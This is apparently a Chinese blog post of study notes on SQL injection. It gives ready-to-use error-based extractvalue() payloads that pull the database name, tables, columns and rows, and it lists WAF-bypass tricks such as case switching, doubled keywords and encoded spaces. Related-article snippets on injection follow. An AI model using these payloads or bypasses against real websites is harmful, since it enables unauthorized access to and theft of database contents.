SQL注入(报错,注入绕过)

已于 2023-05-02 15:45:41 修改
阅读量301 收藏
点赞数
文章标签: sql 数据库
于 2023-04-23 00:37:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62886641/article/details/130312829
版权

1.报错注入

只有在页面上没有显示位但是有SQL语句执行错误的情况下才能使用报错注入。3

参考文献:学习extractvalue()、updatexml()报错注入 - 腾讯云开发者社区-腾讯云 (tencent.com)

报错注入:通过构造非法格式的内容使得函数不能正常执行,通过报错或更新将我们的非法查询的内容回显出来。

获取库名:

' and extractvalue('div', concat('~',database()))#

获取表名:

' and extractvalue('div', concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='数据库名')))#

获取列名:

' and extractvalue('div', concat('~',(select group_concat(column_name) from information_schema.columns where table_schema='数据库名' and table_name='表名')))#

获取数据:

' and extractvalue('div', concat('~',(select 列名 from 表名 limit 0,1)))#

注释:有时候这里会显示不完全

2.注入绕过

WAF(web application firewall,Web应用防火墙)》对每个请求的内容进行按规则检查和过滤。

大小写绕过:and/AND--And,select/SELECT--SeLect

双写关键词绕过:and——anandd

空格过滤绕过:%0a(换行)过滤空格,%00代替#

绕过and和or:&&--and,||--or

=绕过:like;

参考文献:

 sql注入绕过方法总结_sql waf 过滤符号怎么办_huanghelouzi的博客-CSDN博客

补充一点关于burpsuite的使用:query parameters是在URL中传递的参数,而body parameters是在HTTP请求正文中传递的参数。当使用GET方法时,query parameters会被附加到URL中,而当使用POST方法时,body parameters会被包含在HTTP请求正文中

一般来说,query parameters用于传递简单的数据类型,如字符串、数字等。而body parameters则用于传递更复杂的数据类型,如JSON、XML等。此外,在某些情况下,使用body parameters可以更好地保护数据的安全性

HfLllo
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
SQL注入-9种绕过Web应用程序防火墙的方式.rar
09-25
SQL注入-9种绕过web应用程序防火墙的方式,属于比较基础的,可以学习参考
mysql报错注入_mysql注入报错时爆表名、字段名、库名
weixin_33274728的博客
01-13 665
已知某个地方有注入,waf拦截了information_schema、columns、tables、database、schema等关键字或函数,我们如何去获取当前表名,字段名和库名呢?字段名常见的做法有利用union搭配别名子查询,在不知道字段的时候进行注入。例如:select*fromtestwhereid=1unionselect(selecte.4from(sele...
SQL注入入门(一)——SQL注入初认识
Pz_mstr's Blog
08-13 1183
揭开SQL注入的神秘面纱
SQL注入01】SQL注入漏洞简介、原理及类型
Fighting_hawk的博客
02-17 5314
1. 了解SQL注入漏洞的概念和危害; 2. 理解SQL注入漏洞产生的两个条件; 3. 了解SQL注入分类方式; 4. 加深SQL数据库相关知识的理解。
sql注入
弱水三千 只取一韶
03-08 1740
SQL注入攻防入门详解 =============安全性篇目录==============   毕业开始从事winfrm到今年转到 web ,在码农届已经足足混了快接近3年了,但是对安全方面的知识依旧薄弱,事实上是没机会接触相关开发……必须的各种借口。这几天把sql注入的相关知识整理了下,希望大家多多提意见。 (对于sql注入的攻防,我只用过简单拼接字符串的注入及参数化查询,可
SQL注入报错注入
2301_80661529的博客
02-22 1351
然而,当XPath表达式构造不当,例如包含了非法字符或者尝试执行一个无法解析为有效XPath表达式的字符串时,函数会抛出错误,并且错误信息可能包含有关查询的信息,这便为报错注入提供了机会。floor()报错注入的原因是group by在向临时表插入数据时,由于rand()多次计算导致插入临时表时主键重复,从而报错,又因为报错前concat()中的SQL语句或函数被执行,所以该语句报错且被抛出的主键是SQL语句或函数执行后的结果。这个表名可能不存在,服务器会抛出一个错误消息,可能揭示表是否存在的信息。
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
SQL注入之基于布尔的盲注详解
09-10
布尔型SQL注入是一种特殊的SQL注入方式,它发生在服务器对用户输入的数据进行响应时,并不会返回完整的数据库信息,而是仅返回“真”(True)或“假”(False)的反馈。这种方式使得攻击者需要根据系统对正确或错误...
关于sql注入的简要演示(入坑抛砖)
09-09
攻击者可以通过这种方式绕过查询限制,甚至执行任意的SQL命令。 在示例中,攻击者尝试在ID后面添加`'`,导致查询语句被提前闭合,然后可以附加新的SQL代码。通过报错信息,攻击者可以获取关于数据库结构和可能的...
sql注入的思维导图。
04-19
SQL注入思维导图 SQL注入是一种常见的Web应用程序安全漏洞, attackers可以通过在Web应用程序的输入字段中...* 使用多种方式来绕过WAF SQL注入是一种常见的Web应用程序安全漏洞,需要我们对其进行深入的了解和防御。
渗透学习笔记之基于数字型的SQL注入
冰露寒愁的博客
12-10 706
基于数字型的SQL注入注入流程:1.判断SQL注入2.判断是否为root权限3.判断数据库的字段数4.查库名5.查表名6.查字段7.查数据参考文献 注入流程: 1.判断SQL注入 (1) 在提交的URL后加上单引号’, (2) and和or大法:and表示且,必须二者皆成立。or相反。 (3) 加法和减法:这目的是区分数字型和字符型的注入。 2.判断是否为root权限 (1) 目的是判断是否有ro...
sql注入基本原理
fanxindong0620的博客
11-04 157
参考文献: 趣解SQL注入原理 Sql注入基本原理 谢谢作者分享!
【MySQL进阶篇】存储对象:视图、存储过程及触发器
2401_83283514的博客
07-22 1989
存储过程是事先经过编译并存储在数据库中的一段SQL语句的集合,调用存储过程可以简化应用人员的很多工作,减少数据在数据库和应用服务器之间的传输,对于提高数据处理的效率是有好处的。存储过程思想上很简单,就是数据库SQL语言层面的代码的封装与重用。用户自定义变量是用户根据需要自己定义的变量,用户变量不用提前声明,在用的时候直接用“@变量名”使用就可以。其作用域为当前连接。
php连接sql server
佐丶枫
07-23 445
然后把dll文件拷贝到php/ext下 php.ini加入extension=php_sqlsrv.dll.然后就可以用了\。第二种:sqlserver,sqlserver需要php打开sqlserver扩展,windows下载扩展。下载系统对应的64还是32位,还要看支持的php版本,下载下来的压缩包解压。一:odbc连接,废话不多说直接上代码,封装了一个单例。需要下载php_pdo_sqlsrv扩展,php连接sqlserver有三种方式。下载解压拷贝到php/ext下。第三种:pdo_sqlsrv。
SQL 基础知识
最新发布
qq_62752002的博客
07-25 699
用于定义和管理数据库结构的命令。创建数据库创建表...删除数据库删除表修改表。
SQL进阶技巧:如何使用差值累计计算思想巧解数学中递归计算问题
石榴姐yyds
07-23 488
本文给出了一种利用SQL语言如何解决数学上递归问题。解决问题的核心在于对差值累计计算的认识,差值累计计算的本质也就是数学中的迭代计算思想在SQL语言中的体现。本文中所描述的问题需要将上一行的计算结果拿出来放到下一行继续叠加,按照直观的思路需要用lag函数去取上一行值但是lag函数获取的往往都是明确的结果值,而这种需要动态计算,于是会走到递归计算的误区中,而需求中所描述的计算方式就是递归的思路,容易产生误解,但仔细推导我们不难发现其实就是每行按照固定的公式算出差值的累加,即 字段X的累计值减去字段Y的累计值等
SQL报错注入中的0x7e
04-05
0x7e是ASCII码表中的波浪符号(~),在SQL注入攻击中,它通常用于绕过一些简单的过滤器和安全措施。 具体来说,当我们在注入点中输入一些特殊字符(如单引号、双引号、斜杠等),有些过滤器会将它们替换成其他字符...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值